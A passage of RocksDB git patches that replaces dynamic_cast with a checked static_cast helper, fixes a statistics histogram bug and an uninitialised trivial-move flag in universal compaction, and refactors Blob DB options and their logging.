block_table_factory = - dynamic_pointer_cast(options_.table_factory); - - if (block_table_factory) { - return block_table_factory->NewTableReader( + if (BlockBasedTableFactory::kName == options_.table_factory->Name()) { + return options_.table_factory->NewTableReader( TableReaderOptions(ioptions_, soptions_, internal_comparator_, /*skip_filters=*/false), std::move(file_), file_size, &table_reader_, /*enable_prefetch=*/false); } - assert(!block_table_factory); - // For all other factory implementation return options_.table_factory->NewTableReader( TableReaderOptions(ioptions_, soptions_, internal_comparator_), diff --git a/util/cast_util.h b/util/cast_util.h new file mode 100644 index 00000000000..b42d5d6c4a9 --- /dev/null +++ b/util/cast_util.h @@ -0,0 +1,19 @@ +// Copyright (c) 2011-present, Facebook, Inc. All rights reserved. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). + +namespace rocksdb { +// The helper function to assert the move from dynamic_cast<> to +// static_cast<> is correct. This function is to deal with legacy code. +// It is not recommanded to add new code to issue class casting. The preferred +// solution is to implement the functionality without a need of casting. +template +inline DestClass* static_cast_with_check(SrcClass* x) { + DestClass* ret = static_cast(x); +#ifdef ROCKSDB_USE_RTTI + assert(ret == dynamic_cast(x)); +#endif + return ret; +} +} // namespace rocksdb diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index 95deda5b0cc..f55566fd425 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -23,6 +23,7 @@ #include "table/block_based_table_builder.h" #include "table/block_builder.h" #include "table/meta_blocks.h" +#include "util/cast_util.h" #include "util/crc32c.h" #include "util/file_reader_writer.h" #include "util/filename.h" @@ -199,7 +200,8 @@ BlobDBImpl::BlobDBImpl(const std::string& dbname, open_p1_done_(false), debug_level_(0) { const BlobDBOptionsImpl* options_impl = - dynamic_cast(&blob_db_options); + static_cast_with_check( + &blob_db_options); if (options_impl) { bdb_options_ = *options_impl; } @@ -215,12 +217,7 @@ Status BlobDBImpl::LinkToBaseDB(DB* db) { db_ = db; // the Base DB in-itself can be a stackable DB - StackableDB* sdb = dynamic_cast(db_); - if (sdb) { - db_impl_ = dynamic_cast(sdb->GetBaseDB()); - } else { - db_impl_ = dynamic_cast(db); - } + db_impl_ = static_cast_with_check(db_->GetRootDB()); env_ = db_->GetEnv(); @@ -249,7 +246,7 @@ BlobDBOptions BlobDBImpl::GetBlobDBOptions() const { return bdb_options_; } BlobDBImpl::BlobDBImpl(DB* db, const BlobDBOptions& blob_db_options) : BlobDB(db), - db_impl_(dynamic_cast(db)), + db_impl_(static_cast_with_check(db)), opt_db_(new OptimisticTransactionDBImpl(db, false)), wo_set_(false), bdb_options_(blob_db_options), @@ -268,10 +265,9 @@ BlobDBImpl::BlobDBImpl(DB* db, const BlobDBOptions& blob_db_options) total_blob_space_(0) { assert(db_impl_ != nullptr); const BlobDBOptionsImpl* options_impl = - dynamic_cast(&blob_db_options); - if (options_impl) { - bdb_options_ = *options_impl; - } + static_cast_with_check( + &blob_db_options); + bdb_options_ = *options_impl; if (!bdb_options_.blob_dir.empty()) blob_dir_ = (bdb_options_.path_relative) @@ -1752,8 +1748,8 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, gcstats->deleted_size += record.GetBlobSize(); if (first_gc) continue; - Transaction* txn = static_cast(opt_db_.get()) - ->BeginTransaction(write_options_); + Transaction* txn = opt_db_->BeginTransaction( + write_options_, OptimisticTransactionOptions(), nullptr); txn->Delete(cfh, record.Key()); Status s1 = txn->Commit(); // chances that this DELETE will fail is low. If it fails, it would be @@ -1817,8 +1813,8 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, newfile->file_size_ += BlobLogRecord::kHeaderSize + record.Key().size() + record.Blob().size() + BlobLogRecord::kFooterSize; - Transaction* txn = static_cast(opt_db_.get()) - ->BeginTransaction(write_options_); + Transaction* txn = opt_db_->BeginTransaction( + write_options_, OptimisticTransactionOptions(), nullptr); txn->Put(cfh, record.Key(), index_entry); Status s1 = txn->Commit(); // chances that this Put will fail is low. If it fails, it would be because diff --git a/utilities/column_aware_encoding_util.cc b/utilities/column_aware_encoding_util.cc index a77d38d1df9..c36e422549d 100644 --- a/utilities/column_aware_encoding_util.cc +++ b/utilities/column_aware_encoding_util.cc @@ -51,11 +51,9 @@ void ColumnAwareEncodingReader::InitTableReader(const std::string& file_path) { options_.comparator = &internal_comparator_; options_.table_factory = std::make_shared(); - shared_ptr block_table_factory = - std::dynamic_pointer_cast(options_.table_factory); std::unique_ptr table_reader; - block_table_factory->NewTableReader( + options_.table_factory->NewTableReader( TableReaderOptions(ioptions_, soptions_, internal_comparator_, /*skip_filters=*/false), std::move(file_), file_size, &table_reader, /*enable_prefetch=*/false); diff --git a/utilities/options/options_util_test.cc b/utilities/options/options_util_test.cc index 86b382cfab5..2ca8d476721 100644 --- a/utilities/options/options_util_test.cc +++ b/utilities/options/options_util_test.cc @@ -100,28 +100,34 @@ class DummyTableFactory : public TableFactory { DummyTableFactory() {} virtual ~DummyTableFactory() {} - virtual const char* Name() const { return "DummyTableFactory"; } + virtual const char* Name() const override { return "DummyTableFactory"; } - virtual Status NewTableReader(const TableReaderOptions& table_reader_options, - unique_ptr&& file, - uint64_t file_size, - unique_ptr* table_reader, - bool prefetch_index_and_filter_in_cache) const { + virtual Status NewTableReader( + const TableReaderOptions& table_reader_options, + unique_ptr&& file, uint64_t file_size, + unique_ptr* table_reader, + bool prefetch_index_and_filter_in_cache) const override { return Status::NotSupported(); } virtual TableBuilder* NewTableBuilder( const TableBuilderOptions& table_builder_options, - uint32_t column_family_id, WritableFileWriter* file) const { + uint32_t column_family_id, WritableFileWriter* file) const override { return nullptr; } - virtual Status SanitizeOptions(const DBOptions& db_opts, - const ColumnFamilyOptions& cf_opts) const { + virtual Status SanitizeOptions( + const DBOptions& db_opts, + const ColumnFamilyOptions& cf_opts) const override { return Status::NotSupported(); } - virtual std::string GetPrintableTableOptions() const { return ""; } + virtual std::string GetPrintableTableOptions() const override { return ""; } + + Status GetOptionString(std::string* opt_string, + const std::string& delimiter) const override { + return Status::OK(); + } }; class DummyMergeOperator : public MergeOperator { diff --git a/utilities/transactions/optimistic_transaction_impl.cc b/utilities/transactions/optimistic_transaction_impl.cc index 5652189bc35..044dded2365 100644 --- a/utilities/transactions/optimistic_transaction_impl.cc +++ b/utilities/transactions/optimistic_transaction_impl.cc @@ -17,6 +17,7 @@ #include "rocksdb/db.h" #include "rocksdb/status.h" #include "rocksdb/utilities/optimistic_transaction_db.h" +#include "util/cast_util.h" #include "util/string_util.h" #include "utilities/transactions/transaction_util.h" @@ -62,13 +63,7 @@ Status OptimisticTransactionImpl::Commit() { // check whether this transaction is safe to be committed. OptimisticTransactionCallback callback(this); - DBImpl* db_impl = dynamic_cast(db_->GetRootDB()); - if (db_impl == nullptr) { - // This should only happen if we support creating transactions from - // a StackableDB and someone overrides GetRootDB(). - return Status::InvalidArgument( - "DB::GetRootDB() returned an unexpected DB class"); - } + DBImpl* db_impl = static_cast_with_check(db_->GetRootDB()); Status s = db_impl->WriteWithCallback( write_options_, GetWriteBatch()->GetWriteBatch(), &callback); @@ -122,8 +117,7 @@ Status OptimisticTransactionImpl::TryLock(ColumnFamilyHandle* column_family, Status OptimisticTransactionImpl::CheckTransactionForConflicts(DB* db) { Status result; - assert(dynamic_cast(db) != nullptr); - auto db_impl = reinterpret_cast(db); + auto db_impl = static_cast_with_check(db); // Since we are on the write thread and do not want to block other writers, // we will do a cache-only conflict check. This can result in TryAgain diff --git a/utilities/transactions/transaction_db_impl.cc b/utilities/transactions/transaction_db_impl.cc index 2c425dd8d66..69b5bc1ea0f 100644 --- a/utilities/transactions/transaction_db_impl.cc +++ b/utilities/transactions/transaction_db_impl.cc @@ -15,6 +15,7 @@ #include "rocksdb/db.h" #include "rocksdb/options.h" #include "rocksdb/utilities/transaction_db.h" +#include "util/cast_util.h" #include "utilities/transactions/transaction_db_mutex_impl.h" #include "utilities/transactions/transaction_impl.h" @@ -23,7 +24,7 @@ namespace rocksdb { TransactionDBImpl::TransactionDBImpl(DB* db, const TransactionDBOptions& txn_db_options) : TransactionDB(db), - db_impl_(dynamic_cast(db)), + db_impl_(static_cast_with_check(db)), txn_db_options_(txn_db_options), lock_mgr_(this, txn_db_options_.num_stripes, txn_db_options.max_num_locks, txn_db_options_.custom_mutex_factory @@ -52,7 +53,7 @@ TransactionDBImpl::TransactionDBImpl(DB* db, TransactionDBImpl::TransactionDBImpl(StackableDB* db, const TransactionDBOptions& txn_db_options) : TransactionDB(db), - db_impl_(dynamic_cast(db->GetRootDB())), + db_impl_(static_cast_with_check(db->GetRootDB())), txn_db_options_(txn_db_options), lock_mgr_(this, txn_db_options_.num_stripes, txn_db_options.max_num_locks, txn_db_options_.custom_mutex_factory @@ -371,8 +372,7 @@ Status TransactionDBImpl::Write(const WriteOptions& opts, WriteBatch* updates) { Transaction* txn = BeginInternalTransaction(opts); txn->DisableIndexing(); - assert(dynamic_cast(txn) != nullptr); - auto txn_impl = reinterpret_cast(txn); + auto txn_impl = static_cast_with_check(txn); // Since commitBatch sorts the keys before locking, concurrent Write() // operations will not cause a deadlock. @@ -412,8 +412,7 @@ bool TransactionDBImpl::TryStealingExpiredTransactionLocks( void TransactionDBImpl::ReinitializeTransaction( Transaction* txn, const WriteOptions& write_options, const TransactionOptions& txn_options) { - assert(dynamic_cast(txn) != nullptr); - auto txn_impl = reinterpret_cast(txn); + auto txn_impl = static_cast_with_check(txn); txn_impl->Reinitialize(this, write_options, txn_options); } diff --git a/utilities/transactions/transaction_impl.cc b/utilities/transactions/transaction_impl.cc index 408b15bcd3d..dd0c69be48b 100644 --- a/utilities/transactions/transaction_impl.cc +++ b/utilities/transactions/transaction_impl.cc @@ -19,6 +19,7 @@ #include "rocksdb/snapshot.h" #include "rocksdb/status.h" #include "rocksdb/utilities/transaction_db.h" +#include "util/cast_util.h" #include "util/string_util.h" #include "util/sync_point.h" #include "utilities/transactions/transaction_db_impl.h" @@ -46,10 +47,9 @@ TransactionImpl::TransactionImpl(TransactionDB* txn_db, lock_timeout_(0), deadlock_detect_(false), deadlock_detect_depth_(0) { - txn_db_impl_ = dynamic_cast(txn_db); - assert(txn_db_impl_); - db_impl_ = dynamic_cast(txn_db->GetRootDB()); - assert(db_impl_); + txn_db_impl_ = + static_cast_with_check(txn_db); + db_impl_ = static_cast_with_check(txn_db->GetRootDB()); Initialize(txn_options); } @@ -526,8 +526,7 @@ Status TransactionImpl::ValidateSnapshot(ColumnFamilyHandle* column_family, *new_seqno = seq; - assert(dynamic_cast(db_) != nullptr); - auto db_impl = reinterpret_cast(db_); + auto db_impl = static_cast_with_check(db_); ColumnFamilyHandle* cfh = column_family ? column_family : db_impl->DefaultColumnFamily(); diff --git a/utilities/transactions/transaction_lock_mgr.cc b/utilities/transactions/transaction_lock_mgr.cc index a10aec17d7b..1184f667d81 100644 --- a/utilities/transactions/transaction_lock_mgr.cc +++ b/utilities/transactions/transaction_lock_mgr.cc @@ -22,6 +22,7 @@ #include "rocksdb/slice.h" #include "rocksdb/utilities/transaction_db_mutex.h" +#include "util/cast_util.h" #include "util/murmurhash.h" #include "util/sync_point.h" #include "util/thread_local.h" @@ -112,8 +113,9 @@ TransactionLockMgr::TransactionLockMgr( max_num_locks_(max_num_locks), lock_maps_cache_(new ThreadLocalPtr(&UnrefLockMapsCache)), mutex_factory_(mutex_factory) { - txn_db_impl_ = dynamic_cast(txn_db); - assert(txn_db_impl_); + assert(txn_db); + txn_db_impl_ = + static_cast_with_check(txn_db); } TransactionLockMgr::~TransactionLockMgr() {} From a84cee8127a0e9724b26e7d1d527f220c358c328 Mon Sep 17 00:00:00 2001 From: Siying Dong Date: Mon, 31 Jul 2017 12:00:02 -0700 Subject: [PATCH 063/205] Add a missing "once" in .h Summary: Closes https://github.com/facebook/rocksdb/pull/2670 Differential Revision: D5529018 Pulled By: siying fbshipit-source-id: 10a378933d509035d2dbe502247dd85fcea09789 --- util/cast_util.h | 2 ++ 1 file changed, 2 insertions(+) diff --git a/util/cast_util.h b/util/cast_util.h index b42d5d6c4a9..2dc8138ab3c 100644 --- a/util/cast_util.h +++ b/util/cast_util.h @@ -3,6 +3,8 @@ // COPYING file in the root directory) and Apache 2.0 License // (found in the LICENSE.Apache file in the root directory). +#pragma once + namespace rocksdb { // The helper function to assert the move from dynamic_cast<> to // static_cast<> is correct. This function is to deal with legacy code. From 6a36b3a7b9eba3766665aa66615ab59dece10e98 Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Mon, 31 Jul 2017 12:07:42 -0700 Subject: [PATCH 064/205] fix db get/write stats Summary: we were passing `record_read_stats` (a bool) as the `hist_type` argument, which meant we were updating either `rocksdb.db.get.micros` (`hist_type == 0`) or `rocksdb.db.write.micros` (`hist_type == 1`) with wrong data. Closes https://github.com/facebook/rocksdb/pull/2666 Differential Revision: D5520384 Pulled By: ajkr fbshipit-source-id: 2f7c956aec32f8b58c5c18845ac478e0230c9516 --- HISTORY.md | 3 +++ db/table_cache.cc | 8 ++++---- 2 files changed, 7 insertions(+), 4 deletions(-) diff --git a/HISTORY.md b/HISTORY.md index 76e01f04c01..53ff4b9cf0b 100644 --- a/HISTORY.md +++ b/HISTORY.md @@ -4,6 +4,9 @@ * Add Iterator::Refresh(), which allows users to update the iterator state so that they can avoid some initialization costs of recreating iterators. * Replace dynamic_cast<> (except unit test) so people can choose to build with RTTI off. With make, release mode is by default built with -fno-rtti and debug mode is built without it. Users can override it by setting USE_RTTI=0 or 1. +### Bug Fixes +* Fix wrong latencies in `rocksdb.db.get.micros`, `rocksdb.db.write.micros`, and `rocksdb.sst.read.micros`. + ## 5.7.0 (07/13/2017) ### Public API Change * DB property "rocksdb.sstables" now prints keys in hex form. diff --git a/db/table_cache.cc b/db/table_cache.cc index a1a03d3bed7..b4d5cc1bb71 100644 --- a/db/table_cache.cc +++ b/db/table_cache.cc @@ -106,10 +106,10 @@ Status TableCache::GetTableReader( } StopWatch sw(ioptions_.env, ioptions_.statistics, TABLE_OPEN_IO_MICROS); std::unique_ptr file_reader( - new RandomAccessFileReader(std::move(file), fname, ioptions_.env, - ioptions_.statistics, record_read_stats, - file_read_hist, ioptions_.rate_limiter, - for_compaction)); + new RandomAccessFileReader( + std::move(file), fname, ioptions_.env, + record_read_stats ? ioptions_.statistics : nullptr, SST_READ_MICROS, + file_read_hist, ioptions_.rate_limiter, for_compaction)); s = ioptions_.table_factory->NewTableReader( TableReaderOptions(ioptions_, env_options, internal_comparator, skip_filters, level), From 3218edc573477a091058eebf565d57d6d1e25a93 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=A5=8F=E4=B9=8B=E7=AB=A0?= Date: Mon, 31 Jul 2017 14:22:37 -0700 Subject: [PATCH 065/205] Fix universal compaction bug Summary: this value ``` Compaction::is_trivial_move_ ``` uninitialized . under universal compaction , we enable ``` CompactionOptionsUniversal::allow_trivial_move ``` , https://github.com/facebook/rocksdb/blob/9b11d4345a0f01fc3de756e01460bf1b0446f326/db/compaction.cc#L245 here is a disastrous bug , some sst trivial move to target level without overlap check ... THEN , DATABASE DAMAGED , WE GOT A LEVEL WITH OVERLAP ! Closes https://github.com/facebook/rocksdb/pull/2634 Differential Revision: D5530722 Pulled By: siying fbshipit-source-id: 425ab55bca5967110377d634258360bcf88c200e --- db/compaction.cc | 1 + 1 file changed, 1 insertion(+) diff --git a/db/compaction.cc b/db/compaction.cc index ea2c011a45c..31adcc29de4 100644 --- a/db/compaction.cc +++ b/db/compaction.cc @@ -169,6 +169,7 @@ Compaction::Compaction(VersionStorageInfo* vstorage, bottommost_level_(IsBottommostLevel(output_level_, vstorage, inputs_)), is_full_compaction_(IsFullCompaction(vstorage, inputs_)), is_manual_compaction_(_manual_compaction), + is_trivial_move_(false), compaction_reason_(_compaction_reason) { MarkFilesBeingCompacted(true); if (is_manual_compaction_) { From 1900771bd29ca37b4d41d4ee59c2de3ae95526ef Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Tue, 1 Aug 2017 12:48:22 -0700 Subject: [PATCH 066/205] Dump Blob DB options to info log Summary: * Dump blob db options to info log * Remove BlobDBOptionsImpl to disallow dynamic cast *BlobDBOptions into *BlobDBOptionsImpl. Move options there to be constants or into BlobDBOptions. The dynamic cast is broken after #2645 * Change some of the default options * Remove blob_db_options.min_blob_size, which is unimplemented. Will implement it soon. Closes https://github.com/facebook/rocksdb/pull/2671 Differential Revision: D5529912 Pulled By: yiwu-arbug fbshipit-source-id: dcd58ca981db5bcc7f123b65a0d6f6ae0dc703c7 --- CMakeLists.txt | 1 - TARGETS | 1 - src.mk | 1 - tools/db_bench_tool.cc | 5 +- utilities/blob_db/blob_db.cc | 85 +++++++++++++++-------- utilities/blob_db/blob_db.h | 32 ++++----- utilities/blob_db/blob_db_impl.cc | 50 +++++-------- utilities/blob_db/blob_db_impl.h | 48 ++++++++++++- utilities/blob_db/blob_db_options_impl.cc | 69 ------------------ utilities/blob_db/blob_db_options_impl.h | 76 -------------------- utilities/blob_db/blob_db_test.cc | 31 ++++----- 11 files changed, 151 insertions(+), 248 deletions(-) delete mode 100644 utilities/blob_db/blob_db_options_impl.cc delete mode 100644 utilities/blob_db/blob_db_options_impl.h diff --git a/CMakeLists.txt b/CMakeLists.txt index 00756e8e3ad..bc8eb5d6152 100644 --- a/CMakeLists.txt +++ b/CMakeLists.txt @@ -476,7 +476,6 @@ set(SOURCES utilities/backupable/backupable_db.cc utilities/blob_db/blob_db.cc utilities/blob_db/blob_db_impl.cc - utilities/blob_db/blob_db_options_impl.cc utilities/blob_db/blob_dump_tool.cc utilities/blob_db/blob_file.cc utilities/blob_db/blob_log_reader.cc diff --git a/TARGETS b/TARGETS index 525e5d38bc0..f2aa661f38f 100644 --- a/TARGETS +++ b/TARGETS @@ -206,7 +206,6 @@ cpp_library( "utilities/backupable/backupable_db.cc", "utilities/blob_db/blob_db.cc", "utilities/blob_db/blob_db_impl.cc", - "utilities/blob_db/blob_db_options_impl.cc", "utilities/blob_db/blob_file.cc", "utilities/blob_db/blob_log_reader.cc", "utilities/blob_db/blob_log_writer.cc", diff --git a/src.mk b/src.mk index 014287ce0a5..81d78eb36fb 100644 --- a/src.mk +++ b/src.mk @@ -154,7 +154,6 @@ LIB_SOURCES = \ utilities/backupable/backupable_db.cc \ utilities/blob_db/blob_db.cc \ utilities/blob_db/blob_db_impl.cc \ - utilities/blob_db/blob_db_options_impl.cc \ utilities/blob_db/blob_file.cc \ utilities/blob_db/blob_log_reader.cc \ utilities/blob_db/blob_log_writer.cc \ diff --git a/tools/db_bench_tool.cc b/tools/db_bench_tool.cc index a1c6af0290d..8f3ae353684 100644 --- a/tools/db_bench_tool.cc +++ b/tools/db_bench_tool.cc @@ -3311,10 +3311,7 @@ void VerifyDBFromDB(std::string& truth_db_name) { } else if (FLAGS_use_blob_db) { blob_db::BlobDBOptions blob_db_options; blob_db::BlobDB* ptr; - s = CreateLoggerFromOptions(db_name, options, &options.info_log); - if (s.ok()) { - s = blob_db::BlobDB::Open(options, blob_db_options, db_name, &ptr); - } + s = blob_db::BlobDB::Open(options, blob_db_options, db_name, &ptr); if (s.ok()) { db->db = ptr; } diff --git a/utilities/blob_db/blob_db.cc b/utilities/blob_db/blob_db.cc index ea60ad59b47..4f95b61f284 100644 --- a/utilities/blob_db/blob_db.cc +++ b/utilities/blob_db/blob_db.cc @@ -5,7 +5,14 @@ // #ifndef ROCKSDB_LITE +#ifndef __STDC_FORMAT_MACROS +#define __STDC_FORMAT_MACROS +#endif + #include "utilities/blob_db/blob_db.h" + +#include + #include "db/write_batch_internal.h" #include "monitoring/instrumented_mutex.h" #include "options/cf_options.h" @@ -94,23 +101,31 @@ Status BlobDB::Open(const Options& options, const BlobDBOptions& bdb_options, return s; } -Status BlobDB::Open(const DBOptions& db_options, +Status BlobDB::Open(const DBOptions& db_options_input, const BlobDBOptions& bdb_options, const std::string& dbname, const std::vector& column_families, std::vector* handles, BlobDB** blob_db, bool no_base_db) { *blob_db = nullptr; + Status s; + + DBOptions db_options(db_options_input); + if (db_options.info_log == nullptr) { + s = CreateLoggerFromOptions(dbname, db_options, &db_options.info_log); + if (!s.ok()) { + return s; + } + } - DBOptions my_db_options(db_options); FlushBeginListener_t fblistener = std::make_shared(); CompactionListener_t ce_listener = std::make_shared(); ReconcileWalFilter_t rw_filter = std::make_shared(); - my_db_options.listeners.emplace_back(fblistener); - my_db_options.listeners.emplace_back(ce_listener); - my_db_options.wal_filter = rw_filter.get(); + db_options.listeners.emplace_back(fblistener); + db_options.listeners.emplace_back(ce_listener); + db_options.wal_filter = rw_filter.get(); { MutexLock l(&listener_mutex); @@ -120,19 +135,25 @@ Status BlobDB::Open(const DBOptions& db_options, } // we need to open blob db first so that recovery can happen - BlobDBImpl* bdb = new BlobDBImpl(dbname, bdb_options, my_db_options); + BlobDBImpl* bdb = new BlobDBImpl(dbname, bdb_options, db_options); fblistener->SetImplPtr(bdb); ce_listener->SetImplPtr(bdb); rw_filter->SetImplPtr(bdb); - Status s = bdb->OpenPhase1(); - if (!s.ok()) return s; + s = bdb->OpenPhase1(); + if (!s.ok()) { + return s; + } - if (no_base_db) return s; + if (no_base_db) { + return s; + } DB* db = nullptr; - s = DB::Open(my_db_options, dbname, column_families, handles, &db); - if (!s.ok()) return s; + s = DB::Open(db_options, dbname, column_families, handles, &db); + if (!s.ok()) { + return s; + } // set the implementation pointer s = bdb->LinkToBaseDB(db); @@ -141,28 +162,36 @@ Status BlobDB::Open(const DBOptions& db_options, bdb = nullptr; } *blob_db = bdb; + bdb_options.Dump(db_options.info_log.get()); return s; } BlobDB::BlobDB(DB* db) : StackableDB(db) {} -//////////////////////////////////////////////////////////////////////////////// -// -// -// std::function fnCaller = -// std::bind(&A::fn, &anInstance, std::placeholders::_1); -//////////////////////////////////////////////////////////////////////////////// -BlobDBOptions::BlobDBOptions() - : blob_dir("blob_dir"), - path_relative(true), - is_fifo(false), - blob_dir_size(1000ULL * 1024ULL * 1024ULL * 1024ULL), - ttl_range_secs(3600), - min_blob_size(512), - bytes_per_sync(0), - blob_file_size(256 * 1024 * 1024), - num_concurrent_simple_blobs(4), - compression(kNoCompression) {} +void BlobDBOptions::Dump(Logger* log) const { + ROCKS_LOG_HEADER(log, " blob_db_options.blob_dir: %s", + blob_dir.c_str()); + ROCKS_LOG_HEADER(log, " blob_db_options.path_relative: %d", + path_relative); + ROCKS_LOG_HEADER(log, " blob_db_options.is_fifo: %d", + is_fifo); + ROCKS_LOG_HEADER(log, " blob_db_options.blob_dir_size: %" PRIu64, + blob_dir_size); + ROCKS_LOG_HEADER(log, " blob_db_options.ttl_range_secs: %" PRIu32, + ttl_range_secs); + ROCKS_LOG_HEADER(log, " blob_db_options.bytes_per_sync: %" PRIu64, + bytes_per_sync); + ROCKS_LOG_HEADER(log, " blob_db_options.blob_file_size: %" PRIu64, + blob_file_size); + ROCKS_LOG_HEADER(log, "blob_db_options.num_concurrent_simple_blobs: %" PRIu32, + num_concurrent_simple_blobs); + ROCKS_LOG_HEADER(log, " blob_db_options.ttl_extractor: %p", + ttl_extractor.get()); + ROCKS_LOG_HEADER(log, " blob_db_options.compression: %d", + static_cast(compression)); + ROCKS_LOG_HEADER(log, " blob_db_options.disable_background_tasks: %d", + disable_background_tasks); +} } // namespace blob_db } // namespace rocksdb diff --git a/utilities/blob_db/blob_db.h b/utilities/blob_db/blob_db.h index e68b40a0ac7..b645ea6efdd 100644 --- a/utilities/blob_db/blob_db.h +++ b/utilities/blob_db/blob_db.h @@ -31,18 +31,18 @@ class TTLExtractor; struct BlobDBOptions { // name of the directory under main db, where blobs will be stored. // default is "blob_dir" - std::string blob_dir; + std::string blob_dir = "blob_dir"; // whether the blob_dir path is relative or absolute. - bool path_relative; + bool path_relative = true; // is the eviction strategy fifo based - bool is_fifo; + bool is_fifo = false; // maximum size of the blob dir. Once this gets used, up // evict the blob file which is oldest (is_fifo ) // 0 means no limits - uint64_t blob_dir_size; + uint64_t blob_dir_size = 0; // a new bucket is opened, for ttl_range. So if ttl_range is 600seconds // (10 minutes), and the first bucket starts at 1471542000 @@ -50,26 +50,22 @@ struct BlobDBOptions { // first bucket is 1471542000 - 1471542600 // second bucket is 1471542600 - 1471543200 // and so on - uint32_t ttl_range_secs; - - // at what size will the blobs be stored in separate log rather than - // inline - uint64_t min_blob_size; + uint32_t ttl_range_secs = 3600; // at what bytes will the blob files be synced to blob log. - uint64_t bytes_per_sync; + uint64_t bytes_per_sync = 0; // the target size of each blob file. File will become immutable // after it exceeds that size - uint64_t blob_file_size; + uint64_t blob_file_size = 256 * 1024 * 1024; // how many files to use for simple blobs at one time - uint32_t num_concurrent_simple_blobs; + uint32_t num_concurrent_simple_blobs = 1; // Instead of setting TTL explicitly by calling PutWithTTL or PutUntil, // applications can set a TTLExtractor which can extract TTL from key-value // pairs. - std::shared_ptr ttl_extractor; + std::shared_ptr ttl_extractor = nullptr; // eviction callback. // this function will be called for every blob that is getting @@ -78,14 +74,12 @@ struct BlobDBOptions { gc_evict_cb_fn; // what compression to use for Blob's - CompressionType compression; - - // default constructor - BlobDBOptions(); + CompressionType compression = kNoCompression; - BlobDBOptions(const BlobDBOptions& in) = default; + // Disable all background job. + bool disable_background_tasks = false; - virtual ~BlobDBOptions() = default; + void Dump(Logger* log) const; }; class BlobDB : public StackableDB { diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index f55566fd425..0488d99242a 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -199,12 +199,6 @@ BlobDBImpl::BlobDBImpl(const std::string& dbname, total_blob_space_(0), open_p1_done_(false), debug_level_(0) { - const BlobDBOptionsImpl* options_impl = - static_cast_with_check( - &blob_db_options); - if (options_impl) { - bdb_options_ = *options_impl; - } blob_dir_ = (bdb_options_.path_relative) ? dbname + "/" + bdb_options_.blob_dir : bdb_options_.blob_dir; @@ -263,12 +257,6 @@ BlobDBImpl::BlobDBImpl(DB* db, const BlobDBOptions& blob_db_options) total_periods_write_(0), total_periods_ampl_(0), total_blob_space_(0) { - assert(db_impl_ != nullptr); - const BlobDBOptionsImpl* options_impl = - static_cast_with_check( - &blob_db_options); - bdb_options_ = *options_impl; - if (!bdb_options_.blob_dir.empty()) blob_dir_ = (bdb_options_.path_relative) ? db_->GetName() + "/" + bdb_options_.blob_dir @@ -304,27 +292,27 @@ Status BlobDBImpl::OpenPhase1() { void BlobDBImpl::StartBackgroundTasks() { // store a call to a member function and object tqueue_.add( - bdb_options_.reclaim_of_period_millisecs, + kReclaimOpenFilesPeriodMillisecs, std::bind(&BlobDBImpl::ReclaimOpenFiles, this, std::placeholders::_1)); - tqueue_.add(bdb_options_.gc_check_period_millisecs, + tqueue_.add(kGCCheckPeriodMillisecs, std::bind(&BlobDBImpl::RunGC, this, std::placeholders::_1)); tqueue_.add( - bdb_options_.deletion_check_period_millisecs, + kDeleteCheckPeriodMillisecs, std::bind(&BlobDBImpl::EvictDeletions, this, std::placeholders::_1)); tqueue_.add( - bdb_options_.deletion_check_period_millisecs, + kDeleteCheckPeriodMillisecs, std::bind(&BlobDBImpl::EvictCompacted, this, std::placeholders::_1)); tqueue_.add( - bdb_options_.delete_obsf_period_millisecs, + kDeleteObsoletedFilesPeriodMillisecs, std::bind(&BlobDBImpl::DeleteObsFiles, this, std::placeholders::_1)); - tqueue_.add(bdb_options_.sanity_check_period_millisecs, + tqueue_.add(kSanityCheckPeriodMillisecs, std::bind(&BlobDBImpl::SanityCheck, this, std::placeholders::_1)); - tqueue_.add(bdb_options_.wa_stats_period_millisecs, + tqueue_.add(kWriteAmplificationStatsPeriodMillisecs, std::bind(&BlobDBImpl::WaStats, this, std::placeholders::_1)); - tqueue_.add(bdb_options_.fsync_files_period_millisecs, + tqueue_.add(kFSyncFilesPeriodMillisecs, std::bind(&BlobDBImpl::FsyncFiles, this, std::placeholders::_1)); tqueue_.add( - bdb_options_.check_seqf_period_millisecs, + kCheckSeqFilesPeriodMillisecs, std::bind(&BlobDBImpl::CheckSeqFiles, this, std::placeholders::_1)); } @@ -1606,8 +1594,9 @@ std::pair BlobDBImpl::FsyncFiles(bool aborted) { std::pair BlobDBImpl::ReclaimOpenFiles(bool aborted) { if (aborted) return std::make_pair(false, -1); - if (open_file_count_.load() < bdb_options_.open_files_trigger) + if (open_file_count_.load() < kOpenFilesTrigger) { return std::make_pair(true, -1); + } // in the future, we should sort by last_access_ // instead of closing every file @@ -1628,7 +1617,7 @@ std::pair BlobDBImpl::WaStats(bool aborted) { WriteLock wl(&mutex_); - if (all_periods_write_.size() < bdb_options_.wa_num_stats_periods) { + if (all_periods_write_.size() < kWriteAmplificationStatsPeriods) { total_periods_write_ -= (*all_periods_write_.begin()); total_periods_ampl_ = (*all_periods_ampl_.begin()); @@ -1868,15 +1857,14 @@ bool BlobDBImpl::ShouldGCFile(std::shared_ptr bfile, std::time_t tt, return true; } - if (bdb_options_.ttl_range_secs < - bdb_options_.partial_expiration_gc_range_secs) { + if (bdb_options_.ttl_range_secs < kPartialExpirationGCRangeSecs) { *reason = "has ttl but partial expiration not turned on"; return false; } ReadLock lockbfile_r(&bfile->mutex_); bool ret = ((bfile->deleted_size_ * 100.0 / bfile->file_size_.load()) > - bdb_options_.partial_expiration_pct); + kPartialExpirationPercentage); if (ret) { *reason = "deleted blobs beyond threshold"; } else { @@ -1895,13 +1883,14 @@ bool BlobDBImpl::ShouldGCFile(std::shared_ptr bfile, std::time_t tt, ReadLock lockbfile_r(&bfile->mutex_); if 